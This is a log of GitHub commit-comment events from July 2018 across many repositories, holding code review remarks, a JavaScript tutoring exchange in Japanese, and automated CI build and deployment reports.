{"id":"7951287092","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29673847,"position":29,"line":29,"path":"018/1801.html","commit_id":"5b34d142cc68fbe08d51d16d6ee6236cb7587a5c","created_at":"2018-07-11T16:39:48Z","updated_at":"2018-07-11T16:39:48Z","author_association":"COLLABORATOR","body":"@c-osanai \r\nおお、できてますね！！\r\n\r\nreturn は一旦 javascript return で検索してみましょう。\r\nあるいは「javascript 関数 戻り値」で検索してみましょう。\r\n\r\nそして実験してみてください。\r\n```\r\nfunction  experiment1(){\r\n   \"あいうえお\";\r\n}\r\nfunction  experiment2 (){\r\n   return \"かきくけこ\";\r\n}\r\n\r\nconsole.log(experiment1());\r\nconsole.log(experiment2());\r\n```\r\n何か動きがわからないことがあればとにかく実験がおすすめです( `codepen` などを活用してください 操作方法がわからなければ土曜日に質問くださいませ)。それを癖にすることによって自分でコードを理解する力が上がってきます。言語の細かい動きや仕様を暗記する必要は全くありません。わからないたびにググったり実験したりが大切です。\r\n僕は今でもよくやります。毎日わからないことを検索しています！続けてやっていきましょう！"}},"created_at":"2018-07-11T16:39:48Z"}
{"id":"7951289322","type":"CommitCommentEvent","actor":{"login":"rudykocur"},"repo":{"name":"Kgrzeskowiak/first"},"payload":{"comment":{"id":29673857,"position":72,"line":67,"path":"LibraryPowered.js","commit_id":"076f2ee4d7b3f5a8219bcec7684237c5f9fe540f","created_at":"2018-07-11T16:40:15Z","updated_at":"2018-07-11T16:40:15Z","author_association":"NONE","body":"a po co Ci sięganie do `db._books`?? przecież iterujesz już po książkach ..."}},"created_at":"2018-07-11T16:40:15Z"}
{"id":"7951292148","type":"CommitCommentEvent","actor":{"login":"kshegunov"},"repo":{"name":"VSRonin/ChatExample"},"payload":{"comment":{"id":29673867,"position":112,"line":143,"path":"QtSimpleChatClient/chatwindow.cpp","commit_id":"b75f93e7124bbbf9e22d061ed85e4de0c95069c0","created_at":"2018-07-11T16:40:49Z","updated_at":"2018-07-11T16:40:49Z","author_association":"COLLABORATOR","body":"Indeed. Will fix. Efficiency here is not key anyway, but if not the one argument `arg()` then perhaps it's clearer to use the `operator +`."}},"created_at":"2018-07-11T16:40:49Z"}
{"id":"7951299144","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29673881,"position":null,"line":null,"path":null,"commit_id":"c09286141dc29db739bc40083786001bc26ca009","created_at":"2018-07-11T16:42:10Z","updated_at":"2018-07-11T16:42:10Z","author_association":"CONTRIBUTOR","body":"tunhunt, tunhuntc - tunhunt.cpp - shows about 1/2 second of gameplay then screen freezes for about a second and keeps repeating that.  I don't see a watchdog triggering in debug log.\r\n![tunhunt-diff](https://user-images.githubusercontent.com/9075896/42587127-cb8c1d46-8507-11e8-8c45-8419d0f969da.png)\r\n![tunhuntc-diff](https://user-images.githubusercontent.com/9075896/42587129-cb9aa15e-8507-11e8-9e62-1fb1815aa885.png)\r\n"}},"created_at":"2018-07-11T16:42:10Z"}
{"id":"7951299753","type":"CommitCommentEvent","actor":{"login":"2Dsharp"},"repo":{"name":"eyeon/Fixture"},"payload":{"comment":{"id":29673884,"position":13,"line":23,"path":"src/tools/transform.cpp","commit_id":"9ee9168a1134d579f23eaaf97317a74bc8025fda","created_at":"2018-07-11T16:42:17Z","updated_at":"2018-07-11T16:42:17Z","author_association":"MEMBER","body":"Are we forcing every click to be a left click?"}},"created_at":"2018-07-11T16:42:17Z"}
{"id":"7951300366","type":"CommitCommentEvent","actor":{"login":"longjj"},"repo":{"name":"longjj/MineCube"},"payload":{"comment":{"id":29673887,"position":null,"line":null,"path":null,"commit_id":"2306dbed1592dba86f6d27ae046e516abd69a815","created_at":"2018-07-11T16:42:24Z","updated_at":"2018-07-11T16:42:24Z","author_association":"OWNER","body":"emm，屏幕只有 768， 初始化 900 怎么用 glViewPort 解决？不如海洋老哥尝试解决一下？ @15331335 "}},"created_at":"2018-07-11T16:42:24Z"}
{"id":"7951303279","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29673889,"position":null,"line":null,"path":null,"commit_id":"0e99b1578d07ebea34e63af09e59d27e808fe667","created_at":"2018-07-11T16:42:58Z","updated_at":"2018-07-11T16:42:58Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-164257 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-164257\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T16:42:58Z"}
{"id":"7951305579","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29673893,"position":null,"line":null,"path":null,"commit_id":"e8838d4a7309729c9953f6c4c52db6fa7ea843bc","created_at":"2018-07-11T16:43:25Z","updated_at":"2018-07-11T16:43:25Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-11T16:43:25Z"}
{"id":"7951307144","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"p51i/next50"},"payload":{"comment":{"id":29673898,"position":null,"line":null,"path":null,"commit_id":"f5f722b815c57890e04eefb0250fcc2d5d73c43f","created_at":"2018-07-11T16:43:43Z","updated_at":"2018-07-11T16:43:43Z","author_association":"OWNER","body":"Created multidev environment [next50#ci-3](https://dashboard.pantheon.io/sites/5a4cf60c-6be0-499b-aba2-a87e5c886799#ci-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-3-next50.pantheonsite.io/)"}},"created_at":"2018-07-11T16:43:43Z"}
{"id":"7951310380","type":"CommitCommentEvent","actor":{"login":"caarlos0"},"repo":{"name":"getantibody/antibody"},"payload":{"comment":{"id":29673908,"position":null,"line":null,"path":null,"commit_id":"170ea34d3a65edddbddf54a7ca765567b81eedd5","created_at":"2018-07-11T16:44:22Z","updated_at":"2018-07-11T16:44:22Z","author_association":"MEMBER","body":"Cool ahaha"}},"created_at":"2018-07-11T16:44:22Z"}
{"id":"7951312510","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29673911,"position":null,"line":null,"path":null,"commit_id":"e8838d4a7309729c9953f6c4c52db6fa7ea843bc","created_at":"2018-07-11T16:44:48Z","updated_at":"2018-07-11T16:44:48Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T16:44:48Z"}
{"id":"7951316610","type":"CommitCommentEvent","actor":{"login":"jmill269"},"repo":{"name":"Azure/azure-functions-durable-extension"},"payload":{"comment":{"id":29673926,"position":null,"line":null,"path":null,"commit_id":"0b7c3605d0a99d4d7be1197a9dd4aa3d02a9ab56","created_at":"2018-07-11T16:45:36Z","updated_at":"2018-07-11T16:45:36Z","author_association":"NONE","body":"Out of curiosity, where is one supposed to send GET requests to without the run.csx file in the old HttpStart? The index.js version only returns an id after sending a POST request, at least in my eyes making it so that the execution status can't be checked locally. \r\n\r\nI just want to clarify to see if I'm misunderstanding something fundamental. :)"}},"created_at":"2018-07-11T16:45:36Z"}
{"id":"7951322051","type":"CommitCommentEvent","actor":{"login":"sboeuf"},"repo":{"name":"containerd/containerd"},"payload":{"comment":{"id":29673937,"position":58,"line":58,"path":"runtime/v2/binary.go","commit_id":"3c3b72c484a8976aadbfd52651e7c1ad096c1499","created_at":"2018-07-11T16:46:38Z","updated_at":"2018-07-11T16:46:38Z","author_association":"NONE","body":"We should validate the format of the output returned by the `start`, if it's a proper socket path, wdyt ?"}},"created_at":"2018-07-11T16:46:38Z"}
{"id":"7951323971","type":"CommitCommentEvent","actor":{"login":"mahdiyari"},"repo":{"name":"utopian-io/v2.utopian.io"},"payload":{"comment":{"id":29673942,"position":null,"line":null,"path":null,"commit_id":"6db36a4626d58a4f2b84df2bafff2727cea450ce","created_at":"2018-07-11T16:47:00Z","updated_at":"2018-07-11T16:47:00Z","author_association":"NONE","body":"I suggest to not hardcode that beneficiary reward"}},"created_at":"2018-07-11T16:47:00Z"}
{"id":"7951324591","type":"CommitCommentEvent","actor":{"login":"Khrystyna2"},"repo":{"name":"Khrystyna2/take-away.github.io"},"payload":{"comment":{"id":29673945,"position":2,"line":2,"path":"js/main.js","commit_id":"1ade8525a87287f139e99cedf0787b283ffb65b9","created_at":"2018-07-11T16:47:09Z","updated_at":"2018-07-11T16:47:09Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-11T16:47:09Z"}
{"id":"7951326020","type":"CommitCommentEvent","actor":{"login":"Khrystyna2"},"repo":{"name":"Khrystyna2/take-away.github.io"},"payload":{"comment":{"id":29673948,"position":10,"line":14,"path":"js/main.js","commit_id":"1ade8525a87287f139e99cedf0787b283ffb65b9","created_at":"2018-07-11T16:47:25Z","updated_at":"2018-07-11T16:47:25Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-11T16:47:25Z"}
{"id":"7951327695","type":"CommitCommentEvent","actor":{"login":"wegank"},"repo":{"name":"wegank/android_device_xiaomi_msm8996-common"},"payload":{"comment":{"id":29673955,"position":null,"line":null,"path":null,"commit_id":"55fcacaf4badf334203cca48a701ee3d18fc305d","created_at":"2018-07-11T16:47:45Z","updated_at":"2018-07-11T16:47:45Z","author_association":"OWNER","body":"Sorry but I do not own this device anymore (switched to Galaxy S8). I've heard about this issue two months ago, yet according to [this](https://forum.xda-developers.com/showpost.php?p=76716891&postcount=56) it seems like re-adding this line doesn't work (?). Sounds strange.\r\nIn my previous attempts vendor QTI services caused bootloops on AOSP, so I decided to remove these files completely out of vendor. Instead of adding this line back, I'll prefer reverting to android.hardware.power@1.0-service-qti since it contains vendor.lineage.power@1.0_vendor [out of the box](https://review.lineageos.org/#/c/LineageOS/android_hardware_qcom_power/+/209538/2/Android.mk)."}},"created_at":"2018-07-11T16:47:45Z"}
{"id":"7951330784","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29673959,"position":28,"line":28,"path":"018/1801.html","commit_id":"5b34d142cc68fbe08d51d16d6ee6236cb7587a5c","created_at":"2018-07-11T16:48:22Z","updated_at":"2018-07-11T16:48:22Z","author_association":"COLLABORATOR","body":"@c-osanai \r\nここでも console.log(i) をやってみましょう。\r\ni のスコープがどこまでなのかhttps://github.com/c-osanai/techdrive/commit/5b34d142cc68fbe08d51d16d6ee6236cb7587a5c#r29673583 と合わせて確認してみましょう。"}},"created_at":"2018-07-11T16:48:22Z"}
{"id":"7951330894","type":"CommitCommentEvent","actor":{"login":"Traesh"},"repo":{"name":"leviathonbeast/AshamaneCore"},"payload":{"comment":{"id":29673960,"position":69,"line":69,"path":"sql/ashamane/world/2018_07_11_01_world_horde_embassy.sql","commit_id":"ec5f6957d0c99567a7c1378cef6bf2eafd8c5d08","created_at":"2018-07-11T16:48:22Z","updated_at":"2018-07-11T16:48:22Z","author_association":"NONE","body":"As i said on Discord, you have to write your SQL patch so it can be applied multiple times :)"}},"created_at":"2018-07-11T16:48:22Z"}
{"id":"7951332414","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29673965,"position":24,"line":24,"path":"018/1801.html","commit_id":"5b34d142cc68fbe08d51d16d6ee6236cb7587a5c","created_at":"2018-07-11T16:48:40Z","updated_at":"2018-07-11T16:48:40Z","author_association":"COLLABORATOR","body":"このanswerは必要でしょうか？"}},"created_at":"2018-07-11T16:48:40Z"}
{"id":"7951334296","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29673972,"position":null,"line":null,"path":null,"commit_id":"2b35f485a449619060af724ea88a6ef0e1f44e43","created_at":"2018-07-11T16:49:03Z","updated_at":"2018-07-11T16:49:03Z","author_association":"NONE","body":"2b35f48"}},"created_at":"2018-07-11T16:49:03Z"}
{"id":"7951338180","type":"CommitCommentEvent","actor":{"login":"sboeuf"},"repo":{"name":"containerd/containerd"},"payload":{"comment":{"id":29673982,"position":59,"line":59,"path":"runtime/v2/binary.go","commit_id":"3c3b72c484a8976aadbfd52651e7c1ad096c1499","created_at":"2018-07-11T16:49:48Z","updated_at":"2018-07-11T16:49:48Z","author_association":"NONE","body":"Since there is no retry to connect here, the docs/spec should specify something along those lines:\r\n\"Once the start command returns the socket path, containerd can assume the shim has been successfully started and is ready to answer rpc requests\""}},"created_at":"2018-07-11T16:49:48Z"}
{"id":"7951340763","type":"CommitCommentEvent","actor":{"login":"huyhg"},"repo":{"name":"kubernetes-sigs/application"},"payload":{"comment":{"id":29673986,"position":35,"line":23,"path":"hack/sample/application.yaml","commit_id":"28fd24c4bfcf8b1aa2d7a295ecc487ccc61ea88e","created_at":"2018-07-11T16:50:20Z","updated_at":"2018-07-11T16:50:20Z","author_association":"CONTRIBUTOR","body":"`assemblyPhase` shouldn't be under `descriptor`."}},"created_at":"2018-07-11T16:50:20Z"}
{"id":"7951344287","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29673988,"position":34,"line":34,"path":"018/1801.html","commit_id":"5b34d142cc68fbe08d51d16d6ee6236cb7587a5c","created_at":"2018-07-11T16:51:02Z","updated_at":"2018-07-11T16:51:02Z","author_association":"COLLABORATOR","body":"`answerProfile()['name'] `\r\nこの呼び出し方とてもいいですね！以前対面でやったことがいきている気がしています。"}},"created_at":"2018-07-11T16:51:02Z"}
{"id":"7951357144","type":"CommitCommentEvent","actor":{"login":"buko"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29674026,"position":null,"line":null,"path":null,"commit_id":"c05dde01c67b6a1314bca9a56874aafb9ce043f2","created_at":"2018-07-11T16:53:32Z","updated_at":"2018-07-11T16:53:32Z","author_association":"NONE","body":"This looks good! It's very interesting that fixing the underlying issue around NamespaceContext actually also fixed the issue with NamespaceCount. "}},"created_at":"2018-07-11T16:53:32Z"}
{"id":"7951366986","type":"CommitCommentEvent","actor":{"login":"Samasaur1"},"repo":{"name":"Samasaur1/CityManagement"},"payload":{"comment":{"id":29674046,"position":null,"line":null,"path":null,"commit_id":"8a247fbf4f5bf77514614417f339ef8e17742d4a","created_at":"2018-07-11T16:55:25Z","updated_at":"2018-07-11T16:55:25Z","author_association":"OWNER","body":"Note: The commit message is what Travis does. I enabled it to do so"}},"created_at":"2018-07-11T16:55:25Z"}
{"id":"7951368438","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29674051,"position":null,"line":null,"path":null,"commit_id":"26384183857bf645c7713693c9c0b400fcc656ed","created_at":"2018-07-11T16:55:41Z","updated_at":"2018-07-11T16:55:41Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-165539 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-165539\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T16:55:41Z"}
{"id":"7951374751","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"ScratchBuild/MIUI10-XML-Japanese"},"payload":{"comment":{"id":29674069,"position":1,"line":1,"path":"Japanese/main/Provision.apk/res/values-ja/arrays.xml","commit_id":"ad5212f956531038a360f91fd4b3e687bf7656fb","created_at":"2018-07-11T16:56:54Z","updated_at":"2018-07-11T16:56:54Z","author_association":"COLLABORATOR","body":"wrong UTF-8 format\r\n\r\nhttps://translators.xiaomi.eu/XML_MIUI10-Japanese-ja.html"}},"created_at":"2018-07-11T16:56:54Z"}
{"id":"7951381933","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29674086,"position":130,"line":114,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T16:58:16Z","updated_at":"2018-07-11T16:58:16Z","author_association":"NONE","body":"Of course it can make sense for Carol just like you have Visa and Mastercard.\r\n\r\nWhat if I told you that by just adding `this`, all those collisions risks, this idea to use a strong password, evaporate?\r\n\r\n```solidity\r\nreturn keccak256(abi.encodePacked(this, _address, passwordBob)); \r\n```"}},"created_at":"2018-07-11T16:58:16Z"}
{"id":"7951383408","type":"CommitCommentEvent","actor":{"login":"smcv"},"repo":{"name":"elementary/houston"},"payload":{"comment":{"id":29674091,"position":15,"line":24,"path":"src/worker/task/appstream/id.ts","commit_id":"65e1dd2d4d447cb0509a59a8d45aada0e849fbec","created_at":"2018-07-11T16:58:34Z","updated_at":"2018-07-11T16:58:34Z","author_association":"NONE","body":"This name is meant to be the same as the AppStream ID, so it should probably use underscores too."}},"created_at":"2018-07-11T16:58:34Z"}
{"id":"7951385090","type":"CommitCommentEvent","actor":{"login":"ghostrider-reborn"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29674099,"position":null,"line":null,"path":null,"commit_id":"603840139174110eb25d1e36162781fb966fb0d9","created_at":"2018-07-11T16:58:54Z","updated_at":"2018-07-11T16:58:54Z","author_association":"MEMBER","body":"@Akianonymus i'm not sure about that\r\n\r\nyou can ping me at https://t.me/ghostrider_reborn"}},"created_at":"2018-07-11T16:58:54Z"}
{"id":"7951388650","type":"CommitCommentEvent","actor":{"login":"janicduplessis"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29674109,"position":null,"line":null,"path":null,"commit_id":"2d9e2f30e17b8e79f2c44ef533ecdd550671304c","created_at":"2018-07-11T16:59:35Z","updated_at":"2018-07-11T16:59:35Z","author_association":"COLLABORATOR","body":"@jpshelley Hey, could you by any chance test out this react.gradle on your project to see if this fix is still needed? https://github.com/janicduplessis/react-native/blob/5d0d70b7388c1eea39f2fa568a3b52a985107ce2/react.gradle\r\n\r\nThis commit rewrite a big part of how the asset bundle task work and I'm trying to figure out how to merge this with your commit. This fixes issues when using the gradle plugin 3+."}},"created_at":"2018-07-11T16:59:35Z"}
{"id":"7951391789","type":"CommitCommentEvent","actor":{"login":"btkostner"},"repo":{"name":"elementary/houston"},"payload":{"comment":{"id":29674117,"position":15,"line":24,"path":"src/worker/task/appstream/id.ts","commit_id":"65e1dd2d4d447cb0509a59a8d45aada0e849fbec","created_at":"2018-07-11T17:00:12Z","updated_at":"2018-07-11T17:00:12Z","author_association":"MEMBER","body":"Will update"}},"created_at":"2018-07-11T17:00:12Z"}
{"id":"7951395761","type":"CommitCommentEvent","actor":{"login":"itchka"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29674125,"position":36,"line":51,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T17:00:54Z","updated_at":"2018-07-11T17:00:54Z","author_association":"CONTRIBUTOR","body":"I guess we would use the above for a server distro."}},"created_at":"2018-07-11T17:00:54Z"}
{"id":"7951396153","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/nhmla"},"payload":{"comment":{"id":29674127,"position":null,"line":null,"path":null,"commit_id":"853bc15938ec94bc05be4f2460ca2df8c36acadf","created_at":"2018-07-11T17:00:58Z","updated_at":"2018-07-11T17:00:58Z","author_association":"MEMBER","body":"Created multidev environment [nhmla#ci-5](https://dashboard.pantheon.io/sites/5e274a0d-a22e-4c9c-95aa-12ce53d2efa6#ci-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-5-nhmla.pantheonsite.io/)"}},"created_at":"2018-07-11T17:00:58Z"}
{"id":"7951398458","type":"CommitCommentEvent","actor":{"login":"itchka"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29674132,"position":36,"line":51,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T17:01:24Z","updated_at":"2018-07-11T17:01:24Z","author_association":"CONTRIBUTOR","body":"Whoops I meant what is below\r\n"}},"created_at":"2018-07-11T17:01:24Z"}
{"id":"7951400637","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29674136,"position":null,"line":null,"path":null,"commit_id":"70091875b188b6c001632d257fd30ccad8f68833","created_at":"2018-07-11T17:01:50Z","updated_at":"2018-07-11T17:01:50Z","author_association":"NONE","body":"BugFix-EMSAlphaAllocation (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2933 of 2933 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T17:01:50Z"}
{"id":"7951408424","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29674154,"position":null,"line":null,"path":null,"commit_id":"d022a70906164211e1cfaa73227b73080583f16e","created_at":"2018-07-11T17:03:27Z","updated_at":"2018-07-11T17:03:27Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2786 of 2933 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 149 tests had: EIO diffs.\n * 146 tests had: Table big diffs.\n * 9 tests had: ESO small diffs.\n * 4 tests had: MTR small diffs.\n * 18 tests had: ESO big diffs.\n * 1 test had: ERR diffs.\n * 6 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 476\n * Failed: 147\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.99%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T17:03:27Z"}
{"id":"7951408569","type":"CommitCommentEvent","actor":{"login":"BenMounaim"},"repo":{"name":"mbendaoud/warehouse-bend"},"payload":{"comment":{"id":29674157,"position":null,"line":null,"path":null,"commit_id":"4a2e4e2b9901b0961ca1a9f7fc38a0cacf760494","created_at":"2018-07-11T17:03:28Z","updated_at":"2018-07-11T17:03:28Z","author_association":"COLLABORATOR","body":"maintenant c est parfait"}},"created_at":"2018-07-11T17:03:28Z"}
{"id":"7951410506","type":"CommitCommentEvent","actor":{"login":"aysenurck"},"repo":{"name":"aysenurck/git-deneme"},"payload":{"comment":{"id":29674163,"position":null,"line":null,"path":null,"commit_id":"8cfce32c5c664327571bf604c64b4b0ab2c2d770","created_at":"2018-07-11T17:03:52Z","updated_at":"2018-07-11T17:03:52Z","author_association":"OWNER","body":"Elime sağlık, çok güzel değiştirmişim."}},"created_at":"2018-07-11T17:03:52Z"}
{"id":"7951412226","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"p51i/next50"},"payload":{"comment":{"id":29674166,"position":null,"line":null,"path":null,"commit_id":"58146bb322af5344e4991e0efbd8fa84c00db18b","created_at":"2018-07-11T17:04:14Z","updated_at":"2018-07-11T17:04:14Z","author_association":"OWNER","body":"Created multidev environment [next50#pr-1](https://dashboard.pantheon.io/sites/5a4cf60c-6be0-499b-aba2-a87e5c886799#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-next50.pantheonsite.io/)"}},"created_at":"2018-07-11T17:04:14Z"}
{"id":"7951415074","type":"CommitCommentEvent","actor":{"login":"NicolasGrosjean"},"repo":{"name":"ArkoG/LCDA"},"payload":{"comment":{"id":29674169,"position":null,"line":null,"path":null,"commit_id":"2fb2a27d7038cfbfcd4470fdb6702942ecd06867","created_at":"2018-07-11T17:04:49Z","updated_at":"2018-07-11T17:04:49Z","author_association":"COLLABORATOR","body":"This will be useful for #5 "}},"created_at":"2018-07-11T17:04:49Z"}
{"id":"7951419377","type":"CommitCommentEvent","actor":{"login":"LIttleAncientForestKami"},"repo":{"name":"szczepanskikrs/multi-battleships"},"payload":{"comment":{"id":29674177,"position":null,"line":null,"path":null,"commit_id":"6484fefab1f07f11a91a3c54b529b0c7151d6a35","created_at":"2018-07-11T17:05:42Z","updated_at":"2018-07-11T17:05:42Z","author_association":"COLLABORATOR","body":"Mighty great leader :D:D, or should I sob cause it disappeared :D"}},"created_at":"2018-07-11T17:05:42Z"}
{"id":"7951421056","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/nhmla"},"payload":{"comment":{"id":29674181,"position":null,"line":null,"path":null,"commit_id":"24f2e10e3b7d80a6ec2275c30246e1f30890c4cd","created_at":"2018-07-11T17:06:02Z","updated_at":"2018-07-11T17:06:02Z","author_association":"MEMBER","body":"Created multidev environment [nhmla#ci-7](https://dashboard.pantheon.io/sites/5e274a0d-a22e-4c9c-95aa-12ce53d2efa6#ci-7).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-7-nhmla.pantheonsite.io/)"}},"created_at":"2018-07-11T17:06:02Z"}
{"id":"7951425808","type":"CommitCommentEvent","actor":{"login":"joaomoreno"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29674189,"position":9,"line":18,"path":"src/vs/workbench/electron-browser/media/shell.css","commit_id":"0bef29d2eadd04b48d9518b5a96259ec54b64434","created_at":"2018-07-11T17:06:59Z","updated_at":"2018-07-11T17:06:59Z","author_association":"MEMBER","body":"Exactly. I just pushed RAMBO style. Let's see what breaks.\r\n\r\nIt's much better on Linux."}},"created_at":"2018-07-11T17:06:59Z"}
